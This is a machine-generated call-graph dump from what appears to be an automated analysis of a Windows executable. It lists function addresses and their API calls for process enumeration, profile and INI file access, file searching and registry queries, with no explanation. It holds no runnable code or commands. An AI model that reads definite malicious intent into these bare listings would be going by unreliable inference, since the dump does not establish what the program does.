37786->37787 37788 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37786->37788 37853 40a804 memset 37787->37853 37788->37744 37791 4124e0 37790->37791 37792 412505 ??2@YAPAXI 37791->37792 37793 41251c 37792->37793 37798 412521 37792->37798 37875 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37793->37875 37864 444722 37798->37864 37801 41259b wcscpy 37801->37746 37880 40b1ab ??3@YAXPAX ??3@YAXPAX 37802->37880 37806 40ad4b 37815 40ad76 37806->37815 37904 40a9ce 37806->37904 37807 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37808 40ac5c 37807->37808 37808->37806 37808->37807 37810 40ace7 ??3@YAXPAX 37808->37810 37808->37815 37884 40a8d0 37808->37884 37896 4099f4 37808->37896 37810->37808 37814 40a8d0 7 API calls 37814->37815 37881 40aa04 37815->37881 37816 40ada2 37817 40adaa 37816->37817 37818 40adc9 37816->37818 37817->37818 37819 40adb3 _wcsicmp 37817->37819 37818->37751 37818->37752 37819->37817 37819->37818 37909 40dce0 37820->37909 37822 40dd3a GetModuleHandleW 37914 40dba7 37822->37914 37826 40dce0 3 API calls 37825->37826 37827 40db99 37826->37827 37986 40dae1 37827->37986 38000 402f3a 37830->38000 37832 412766 37832->37755 37832->37761 37833 4126d3 _wcsicmp 37834 4126a8 37833->37834 37834->37832 37834->37833 37836 41270a 37834->37836 38034 4125f8 7 API calls 37834->38034 37836->37832 38003 411ac5 37836->38003 37846->37767 37847->37760 37848->37765 37850 40b640 37849->37850 37851 40b639 ??3@YAXPAX 37849->37851 37852 40b1ab ??3@YAXPAX ??3@YAXPAX 37850->37852 37851->37850 37852->37741 37854 40a83b GetSystemDirectoryW 37853->37854 37855 40a84c wcscpy 37853->37855 37854->37855 37860 409719 wcslen 37855->37860 37858 40a881 LoadLibraryW 37859 40a886 37858->37859 37859->37788 37861 409724 37860->37861 37862 409739 wcscat LoadLibraryW 37860->37862 37861->37862 37863 40972c wcscat 37861->37863 37862->37858 37862->37859 37863->37862 37865 444732 37864->37865 37866 444728 DeleteObject 37864->37866 37876 409cc3 37865->37876 37866->37865 37868 412551 37869 4010f9 37868->37869 37870 401130 37869->37870 37871 401134 GetModuleHandleW LoadIconW 37870->37871 37872 401107 wcsncat 37870->37872 37873 40a7be 37871->37873 37872->37870 37874 40a7d2 37873->37874 37874->37801 37874->37874 37875->37798 37879 409bfd memset wcscpy 37876->37879 37878 409cdb CreateFontIndirectW 37878->37868 37879->37878 37880->37808 37882 40aa14 37881->37882 37883 40aa0a ??3@YAXPAX 37881->37883 37882->37816 37883->37882 37885 40a8eb 37884->37885 37886 40a8df wcslen 37884->37886 37887 40a906 ??3@YAXPAX 37885->37887 37888 40a90f 37885->37888 37886->37885 37892 40a919 37887->37892 37889 4099f4 3 API calls 37888->37889 37889->37892 37890 40a932 37894 4099f4 3 API calls 37890->37894 37891 40a929 ??3@YAXPAX 37893 40a93e memcpy 37891->37893 37892->37890 37892->37891 37893->37808 37895 40a93d 37894->37895 37895->37893 37897 409a41 37896->37897 37898 4099fb malloc 37896->37898 37897->37808 37900 409a37 37898->37900 37901 409a1c 37898->37901 37900->37808 37902 409a30 ??3@YAXPAX 37901->37902 37903 409a20 memcpy 37901->37903 37902->37900 37903->37902 37905 40a9e7 37904->37905 37906 40a9dc ??3@YAXPAX 37904->37906 37908 4099f4 3 API calls 37905->37908 37907 40a9f2 37906->37907 37907->37814 37908->37907 37933 409bca GetModuleFileNameW 37909->37933 37911 40dce6 wcsrchr 37912 40dcf5 37911->37912 37913 40dcf9 wcscat 37911->37913 37912->37913 37913->37822 37934 44db70 37914->37934 37918 40dbfd 37937 4447d9 37918->37937 37921 40dc34 wcscpy wcscpy 37963 40d6f5 37921->37963 37922 40dc1f wcscpy 37922->37921 37925 40d6f5 3 API calls 37926 40dc73 37925->37926 37927 40d6f5 3 API calls 37926->37927 37928 40dc89 37927->37928 37929 40d6f5 3 API calls 37928->37929 37930 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37929->37930 37969 40da80 37930->37969 37933->37911 37935 40dbb4 memset memset 37934->37935 37936 409bca GetModuleFileNameW 37935->37936 37936->37918 37939 4447f4 37937->37939 37938 40dc1b 37938->37921 37938->37922 37939->37938 37940 444807 ??2@YAPAXI 37939->37940 37941 44481f 37940->37941 37942 444873 _snwprintf 37941->37942 37943 4448ab wcscpy 37941->37943 37976 44474a 8 API calls 37942->37976 37945 4448bb 37943->37945 37977 44474a 8 API calls 37945->37977 37946 4448a7 37946->37943 37946->37945 37948 4448cd 37978 44474a 8 API calls 37948->37978 37950 4448e2 37979 44474a 8 API calls 37950->37979 37952 4448f7 37980 44474a 8 API calls 37952->37980 37954 44490c 37981 44474a 8 API calls 37954->37981 37956 444921 37982 44474a 8 API calls 37956->37982 37958 444936 37983 44474a 8 API calls 37958->37983 37960 44494b 37984 44474a 8 API calls 37960->37984 37962 444960 ??3@YAXPAX 37962->37938 37964 44db70 37963->37964 37965 40d702 memset GetPrivateProfileStringW 37964->37965 37966 40d752 37965->37966 37967 40d75c WritePrivateProfileStringW 37965->37967 37966->37967 37968 40d758 37966->37968 37967->37968 37968->37925 37970 44db70 37969->37970 37971 40da8d memset 37970->37971 37972 40daac LoadStringW 37971->37972 37973 40dac6 37972->37973 37973->37972 37975 40dade 37973->37975 37985 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37973->37985 37975->37755 37976->37946 37977->37948 37978->37950 37979->37952 37980->37954 37981->37956 37982->37958 37983->37960 37984->37962 37985->37973 37996 409b98 GetFileAttributesW 37986->37996 37988 40daea 37989 40db63 37988->37989 37990 40daef wcscpy wcscpy GetPrivateProfileIntW 37988->37990 37989->37757 37997 40d65d GetPrivateProfileStringW 37990->37997 37992 40db3e 37998 40d65d GetPrivateProfileStringW 37992->37998 37994 40db4f 37999 40d65d GetPrivateProfileStringW 37994->37999 37996->37988 37997->37992 37998->37994 37999->37989 38035 40eaff 38000->38035 38004 411ae2 memset 38003->38004 38005 411b8f 38003->38005 38076 409bca GetModuleFileNameW 38004->38076 38017 411a8b 38005->38017 38007 411b0a wcsrchr 38008 411b22 wcscat 38007->38008 38009 411b1f 38007->38009 38077 414770 wcscpy wcscpy wcscpy CloseHandle 38008->38077 38009->38008 38011 411b67 38078 402afb 38011->38078 38015 411b7f 38134 40ea13 SendMessageW memset SendMessageW 38015->38134 38018 402afb 27 API calls 38017->38018 38019 411ac0 38018->38019 38020 4110dc 38019->38020 38021 41113e 38020->38021 38026 4110f0 38020->38026 38159 40969c LoadCursorW SetCursor 38021->38159 38023 411143 38160 4032b4 38023->38160 38178 444a54 38023->38178 38024 4110f7 _wcsicmp 38024->38026 38025 411157 38027 40ada2 _wcsicmp 38025->38027 38026->38021 38026->38024 38181 410c46 10 API calls 38026->38181 38030 411167 38027->38030 38028 4111af 38030->38028 38031 4111a6 qsort 38030->38031 38031->38028 38034->37834 38036 40eb10 38035->38036 38049 40e8e0 38036->38049 38039 40eb6c memcpy memcpy 38040 40ebe1 38039->38040 38041 40ebb7 38039->38041 38040->38039 38042 40ebf2 ??2@YAPAXI ??2@YAPAXI 38040->38042 38041->38040 38043 40d134 16 API calls 38041->38043 38044 40ec2e ??2@YAPAXI 38042->38044 38047 40ec65 38042->38047 38043->38041 38044->38047 38059 40ea7f 38047->38059 38048 402f49 38048->37834 38050 40e8f2 38049->38050 38051 40e8eb ??3@YAXPAX 38049->38051 38052 40e900 38050->38052 38053 40e8f9 ??3@YAXPAX 38050->38053 38051->38050 38054 40e911 38052->38054 38055 40e90a ??3@YAXPAX 38052->38055 38053->38052 38056 40e931 ??2@YAPAXI ??2@YAPAXI 38054->38056 38057 40e921 ??3@YAXPAX 38054->38057 38058 40e92a ??3@YAXPAX 38054->38058 38055->38054 38056->38039 38057->38058 38058->38056 38060 40aa04 ??3@YAXPAX 38059->38060 38061 40ea88 38060->38061 38062 40aa04 ??3@YAXPAX 38061->38062 38063 40ea90 38062->38063 38064 40aa04 ??3@YAXPAX 38063->38064 38065 40ea98 38064->38065 38066 40aa04 ??3@YAXPAX 38065->38066 38067 40eaa0 38066->38067 38068 40a9ce 4 API calls 38067->38068 38069 40eab3 38068->38069 38070 40a9ce 4 API calls 38069->38070 38071 40eabd 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eac7 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40ead1 38074->38075 38075->38048 38076->38007 38077->38011 38135 40b2cc 38078->38135 38080 402b0a 38081 40b2cc 27 API calls 38080->38081 38082 402b23 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 ??3@YAXPAX 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 ??3@YAXPAX 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab ??3@YAXPAX ??3@YAXPAX 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab ??3@YAXPAX ??3@YAXPAX 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab ??3@YAXPAX ??3@YAXPAX 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 38283 445d54 _wcsicmp 38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab ??3@YAXPAX ??3@YAXPAX 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 445389 255 API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab ??3@YAXPAX ??3@YAXPAX 38382->38778 38384 40c788 38779 40b1ab ??3@YAXPAX ??3@YAXPAX 38384->38779 38386 40c790 38780 40b1ab ??3@YAXPAX ??3@YAXPAX 38386->38780 38388 40c798 38389 40aa04 ??3@YAXPAX 38388->38389 38390 40c7a0 38389->38390 38781 40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 38409->38835 38837 40c634 47 API calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 38419 40be26 _wcsncoll 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab ??3@YAXPAX ??3@YAXPAX 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 4099c6 2 API calls 38474->38475 38475->38468 38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab ??3@YAXPAX ??3@YAXPAX 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 39123 409b98 GetFileAttributesW 38533->39123 38536 408953 38536->38251 38537 408987 38538 4089a1 38537->38538 38539 40898c 38537->38539 39125 409b98 GetFileAttributesW 38538->39125 39124 408560 29 API calls 38539->39124 38542 4089ad 38543 4089b2 38542->38543 38544 4089c7 38542->38544 39126 408560 29 API calls 38543->39126 39127 409b98 GetFileAttributesW 38544->39127 38547 4089d3 38547->38536 38548 4089d8 38547->38548 39128 408560 29 API calls 38548->39128 38551 40b633 ??3@YAXPAX 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf ??3@YAXPAX 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab ??3@YAXPAX ??3@YAXPAX 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab ??3@YAXPAX ??3@YAXPAX 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 ??3@YAXPAX 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 ??3@YAXPAX 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 